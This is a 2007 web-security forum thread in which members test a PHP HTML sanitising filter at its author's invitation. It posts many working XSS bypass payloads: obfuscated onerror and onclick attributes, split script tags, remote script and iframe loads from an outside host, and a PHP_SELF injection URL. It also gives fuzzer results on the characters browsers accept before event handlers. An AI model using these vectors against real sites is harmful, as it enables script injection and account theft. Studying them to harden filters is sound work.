Okay, but whew, I think I really am done testing this... Lots of other projects on the radar. Nice try though, SirNotAppearingOnThisForum!

<IMG src='asdf?&#x27;&#09`style='asd&\#09onerror=alert("XSS")&#09;`;//>

- RSnake
Gotta love it. http://ha.ckers.org

wow, thanks loads for helping :-)

it turns out I had not only not gotten the regex quite right (it was the third try or something too...), but had not taken into account the possibility of it interpreting part of an attribute value as a style attribute.

just a few questions before I reupload it, I tested this some browsers, but just to make sure am I right in figuring that only ", ', ` (ie. closed quotes) and whitespace can be in front of an attribute for it to be interpreted? and do you know what chars, exactly, are possible in an attribute name? (I'm guess alphanumeric, hyphen, underscore and colon, but not too sure)



Edited 1 time(s). Last edit at 01/23/2007 04:55PM by SirNotAppearingOnThisForum.

I decided not to do any guesswork and went straight to my fuzzer. Here are the decimal numbers of what can be put in immediately before an event handler in both IE and Firefox in the following syntax:

<IMG SRC="" [CHAR]onerror="alert('XSS')">

Internet Explorer:
0
9
10
11
12
13
32
47

Firefox
0
8
9
10
13
32

The only one that should be any surprise is 47 the forward slash. Other than that these are the usual suspects.

- RSnake
Gotta love it. http://ha.ckers.org

ok, sweet. I can't thank you enough, rsnake.

I'll reupload it tomorrow; I think I've fixed it for everything you posted so far.

No worries, I aim to break. ;)

- RSnake
Gotta love it. http://ha.ckers.org

Great stuff! I'm fuzzerless so to say ^^ I'm interested how far this will go.
One thing I know 4 sure, I'll wait when RSnake is done with it ;)

ok, updated it.

I decided it was best and less complicated to simply check every attribute in one regular expression, so a) style= won't be found in another attribute and b) we can escape all the quotes in each attribute. Also updated regex in style parser, and fixed it to see ` as a quote.

This one took a little work...

<IMG src="http://ha.ckers.org/" style"="style`=a&#13;/onerror=alert(String.fromCharCode(88,83,83))// >

It turns into:

<IMG src="http://ha.ckers.org/" style"="style="a
/onerror=alert(String.fromCharCode(88,83,83))//" &gt;`>

The style definitions are super important (the order of them and where the quotes go). You absolutely must do it in that order to get IE to ignore the second style definition. Painful but it works. And yes, I realize that it's still technically encapsulated in quotes, welcome to the wonderful world of rendering engines. Unfortunately logic goes right out the window. This is actually a perfect example of why when people tell me they know HTML I sorta laugh. They may be able to make a web-page, but next to no one knows this level of HTML obfuscation.

- RSnake
Gotta love it. http://ha.ckers.org

Wow, that's some pretty wacked out html...

Alright this time, I went ahead and not only checked every attribute, but I decided to only allow the checked attributes through as tag attributes (ie. recreate the tag). Also removed some functions which got sort of redundant after the new attribute verification method.

It's sort of funny; I started this trying to be as minimal and passive as possible (remove the bad instead of allow the good, if you get what I mean), and it managed to morph into a rather aggressive filter.

Thanks so much for your help again rsnake, I would never have figured those work-arounds out myself.

EDIT: spelling



Edited 1 time(s). Last edit at 01/24/2007 03:14PM by SirNotAppearingOnThisForum.

Does this works in your new version?

<img src="google.com/logo.gif" \0onload=document.getElementById('div').innerHTML='haxored!'; />

well you can test it yourself, but no, it dosn't work. the \0 isn't evaluated, so it dosn't catch the second attribute, consequently excluding it from the 'rebuilt' tag.

<a href="hello@hello.com" ONclick)=alert('sss'); >hello@hello.com</a>

Last one, this does work at my version.
damn, this really becomes a good sport ^^

And yet also a learning curve,
because I did not know that such thing was allowed in JavaScript:

onclick)=function();



Edited 2 time(s). Last edit at 01/24/2007 04:18PM by jungsonn.

>Last one, this does work at my version.
version of what? it dosn't work with the latest update of the filter, if that's what you're refering to. if not, then, nevermind...

Yes it was the previous one, I just tryed your newest now;

And this one get's passed:

<marquee direction=right width=200 height=200; onmouseover=alert('aaa'); </ Yo mouseover me......


Rather funny I thought :)

ah yeah, so it does. I knew removing that function would have consequences (it would have added an ending >). fixed, though.



Edited 1 time(s). Last edit at 01/24/2007 04:42PM by SirNotAppearingOnThisForum.

Ok this one also:

<button onclick=alert('aaa'); </ Yo click me......

Seems that it doesn't needs to be closed of for FF, ghehe..

I know this isn't a flaw in the filter but here you go: http://sirnot.110mb.com/htmlformatter.php/%22%3E%3Cscript%3Ealert(1)%3C/script%3E

Not many know how to abuse $SERVER['PHP_SELF']. It doesn't always work though, and I haven't yet figured out what causes it to work on some servers and not on others.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

yeah, that would be because that script is a simple demo wrapper around the filter which I threw together so it could be easily tested. personally I don't really care if the script itself can be exploited; I have nothing on that server besides the filter and a few random html pages, anyhow.

EDIT: I'm afraid I have to leave for ~10 days tomorrow, so don't expect to hear from me for a little while. Thanks a ton for you help, everyone, I really appriciate it :-)



Edited 2 time(s). Last edit at 01/24/2007 05:01PM by SirNotAppearingOnThisForum.

Yes, isn't this solvable by using htmlspecialchars() WhiteAcid? mainly if it is in a form it will do that.

Another issue:

<a href="hello@hello.com" a=`"a'style="a; style='<script'></a><script src=http://ha.ckers.org/xss.js?


Turns into:

<a href="http://hello@hello.com" a="&#96;&quot;a&#39;style=&quot;a;" style="&#39;</a" ><script src="http://ha.ckers.org/xss.js?" ></script></a>

- RSnake
Gotta love it. http://ha.ckers.org

I got one, no obfuscation at all. Still works at time of this post.

Trying the obbvious <iframe src="http://ha.ckers.org/scriptlet.html"></iframe> gets stripped completely, but without ended the iframe the filter does it for you.

<iframe src="http://ha.ckers.org/scriptlet.html" <

gets returned as

<iframe src="http://ha.ckers.org/scriptlet.html" ></iframe>

which still works (in all browsers).

Also,

<s<script>cript>alert('xss');</s</script>cript>

becomes

<script >alert('xss');</script>

unless I'm doing somehthing wrong.

I have a feeling that with a bunch of fixes, some old vectors or combo's of it return. I guess he has to test all vectors again when done fixing. A thing that's usually forgotten in beta-testing. like: ok fixed, but 5 fixes later, the first or second hole returns. Anyway, that's what beta-testing is I guess.

Hahah, you guys are going after all the easy stuff... And yes, I tested both of your vectors and they work exactly as you said they would in the most current version. I just totally skipped over the easy stuff figuring that was already fixed and went right to the very difficult vectors. Nice work eyeced and pOkE! Hahah! Awesome.

- RSnake
Gotta love it. http://ha.ckers.org

p0kE: you can actually shorten that vector to:
alert('xss');</scrip<script>t>
no sense in typing more than you have to ;)

-tx @ lowtech-labs.org

As long as we are shortening his vector, why not reduce a few more chars:

alert('xss')</script<script>

;) Diminutive XSS is fun!

- RSnake
Gotta love it. http://ha.ckers.org

Ok, sorry about that guys. Couldn't really do a whole lot for a tiny bit, but I'm back now :-)

Anyhow, that seemed to be yet another consequence of removing functions... :-/ In retrospect I don't know what I was doing with that general preg_replace call; that was really stupid of me. Moved the node name check to the callback function, so it should be fixed now.